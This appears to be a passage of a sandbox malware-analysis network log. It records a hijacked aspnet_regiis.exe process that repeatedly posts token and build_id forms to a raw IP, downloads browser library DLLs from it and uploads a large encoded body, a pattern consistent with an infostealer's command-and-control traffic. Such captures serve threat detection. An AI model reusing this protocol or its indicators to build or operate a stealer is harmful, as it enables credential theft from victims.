                                                                                                                                                                  2024-10-03 01:36:06 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------ECBGCBGCAFIIECBFIDHICont
2024-10-03 01:36:06 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:06 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:36:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49731 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:07 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAEHCFCBKKJDGCAKFCFI
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Content-Length: 437
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:07 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 34 30 35 32 36 63 61 32 39 30 66 64 30 31 37 61 61 61 62 62 35 63 64 36 31 66 66 32 64 64 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 43 46 43 42 4b 4b 4a 44 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74
                                                                                                                                                                  Data Ascii: ------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CAEHCFCBKKJDGCAKFCFIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CAEHCFCBKKJDGCAKFCFICont
2024-10-03 01:36:08 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:08 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:36:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49732 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:08 UTC | 195 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:36:09 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:09 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:09 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49733 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:10 UTC | 195 | OUT | GET /mozglue.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:36:11 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:11 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 608080
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:11 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes


                                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                   13 | 192.168.2.6 | 49735 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                   2024-10-03 01:36:12 UTC | 196 | OUT | GET /msvcp140.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                   2024-10-03 01:36:13 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:13 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 450024
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:13 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes


                                                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                   14 | 192.168.2.6 | 49736 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                   2024-10-03 01:36:14 UTC | 196 | OUT | GET /softokn3.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                   2024-10-03 01:36:15 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:15 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:15 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                                                                  Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                                                                  Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                                                                  Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                                  Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                                  Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                                  Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49737 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:16 UTC | 200 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:36:16 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:16 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:16 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49738 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:17 UTC | 192 | OUT | GET /nss3.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
2024-10-03 01:36:18 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:17 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 2046288
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:17 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49739 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:20 UTC | 277 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 1025
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 01:36:20 UTC | 1025 | OUT | Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------EGCBFIEHIEGCAAAKKKKECont
2024-10-03 01:36:21 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 01:36:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 01:36:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49740 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:22 UTC | 276 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 01:36:22 UTC | 331 | OUT | Data Ascii: ------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AAKEGDAKEHJDHIDHJJDACont
2024-10-03 01:36:22 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 01:36:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 01:36:22 UTC | 2228 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49741 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:23 UTC | 276 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 01:36:23 UTC | 331 | OUT | Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CFIEBKEHCAKFCBFIDAAKCont
2024-10-03 01:36:24 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 01:36:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 01:36:24 UTC | 1524 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49743 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:25 UTC | 276 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 461
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 01:36:25 UTC | 461 | OUT | Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AFHDHCAAKECFIDHIEBAKCont
2024-10-03 01:36:25 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 03 Oct 2024 01:36:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-10-03 01:36:25 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49744 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:27 UTC | 278 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 49.12.197.9
    Content-Length: 97509
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-10-03 01:36:27 UTC | 16355 | OUT | Data Ascii: ------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="token"5640526ca290fd017aaabb5cd61ff2dd------CAFHIJDHDGDBFHIEHDGIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------CAFHIJDHDGDBFHIEHDGICont
                                                                                                                                                                  2024-10-03 01:36:27 UTC16355OUTData Raw: 52 31 6f 70 54 51 4d 62 6a 6a 76 53 64 71 63 66 65 6b 4e 4d 42 4b 43 50 57 6a 70 51 66 61 6b 4d 54 2f 41 43 61 51 66 6a 54 6a 7a 54 61 59 49 4d 2b 6d 4b 44 2b 66 31 6f 7a 52 32 2b 6e 72 51 4d 4f 75 4f 74 49 61 4d 34 48 76 53 6b 6a 4e 41 43 48 70 30 70 4d 55 76 55 65 74 47 4f 61 42 69 64 6a 53 59 78 32 70 63 55 59 4a 37 38 30 44 45 7a 6b 30 55 70 4f 54 53 55 41 48 65 6b 39 6a 2b 56 4c 6e 73 50 79 70 50 35 65 39 41 42 30 6f 48 48 65 6c 78 6d 6b 78 51 4d 4b 54 4f 65 31 4c 33 2f 6e 51 4b 41 41 2b 6c 4a 2b 56 48 31 6f 36 55 44 45 78 2b 58 74 51 65 50 70 53 6b 66 38 41 36 36 51 6a 42 37 55 41 4a 37 66 79 70 61 4f 31 42 42 78 53 43 35 33 74 46 46 46 51 66 4c 45 55 38 30 31 70 59 33 6c 37 44 71 4e 76 70 30 36 42 62 65 31 6e 75 46 6c 5a 66 4e 63 35 62 48 6c 6f 78
                                                                                                                                                                  Data Ascii: R1opTQMbjjvSdqcfekNMBKCPWjpQfakMT/ACaQfjTjzTaYIM+mKD+f1ozR2+nrQMOuOtIaM4HvSkjNACHp0pMUvUetGOaBidjSYx2pcUYJ780DEzk0UpOTSUAHek9j+VLnsPypP5e9AB0oHHelxmkxQMKTOe1L3/nQKAA+lJ+VH1o6UDEx+XtQePpSkf8A66QjB7UAJ7fypaO1BBxSC53tFFFQfLEU801pY3l7DqNvp06Bbe1nuFlZfNc5bHlox
2024-10-03 01:36:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:28 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
2024-10-03 01:36:28 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49745 | 49.12.197.9 | 443 | 5576 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:36:28 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
